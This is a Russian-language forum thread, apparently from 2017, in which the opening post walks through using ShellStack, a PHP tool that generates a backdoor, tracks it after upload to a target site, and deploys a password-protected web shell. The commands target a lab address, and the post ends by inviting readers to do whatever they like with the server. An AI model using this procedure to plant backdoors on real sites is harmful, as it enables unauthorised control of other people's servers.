HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.06.2017, 23:43
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Приветствую! Здесь речь пойдет о ShellStack – это инструмент на PHP, его предназначением является, менеджмент бэкдоров на целевом сайте.

Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.



ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.

Клонируем инструмент на свою машину с Github.

> git clone https://github.com/Tuhinshubhra/shellstack

> cd shellstack




Запускаем:


> php shellstack.php





Теперь необходимо сгенерировать backdoor, пишем команду:

> generatebd



Выходим из программы Ctrl+C.

В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.



Копируем URL нашего backdoor:



И вставляем его в файл shells.txt:

> echohttp://172.16.0.223/pentest/backdoor.php> shells.txt




Запускаем ShellStack:


> php shellstack.php


Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.


> 0





Открывается список доступных действий:



Узнаем немного больше о целевом хосте:

> 2



Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:

> 1




Обращаем внимание на то, что у каждого шелла есть пароль/логин.

Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:



> 172.16.0.223/pentest/kurama.php

Вводим пароль к шеллу и попадаем в административную панель:



Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.

Спасибо за внимание.
 
Ответить с цитированием

  #2  
Старый 21.06.2017, 19:29
fdgdfgrgfgdf
Новичок
Регистрация: 31.03.2017
Сообщений: 0
С нами: 4799607

Репутация: 0
По умолчанию

А, собственно, не проще ли сразу залить второй шелл?
 
Ответить с цитированием

  #3  
Старый 21.06.2017, 21:58
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

fdgdfgrgfgdf сказал(а):

А, собственно, не проще ли сразу залить второй шелл?

Конечно проще
 
Ответить с цитированием

  #4  
Старый 19.11.2017, 14:40
CyberX88
Новичок
Регистрация: 20.02.2017
Сообщений: 0
С нами: 4855409

Репутация: 0
По умолчанию

Вроде не плохой гайд,но затестить не смог из-за того что не знаю как залить на сайт файл
 
Ответить с цитированием

  #5  
Старый 22.11.2017, 20:31
Сергей Попов
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами: 5656404

Репутация: 0
По умолчанию

Цитата:

HtOnion сказал(а):

Протестил, отличная тема)

Для благодарности есть кнопка "Мне нравится". С уважением. Администратор.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.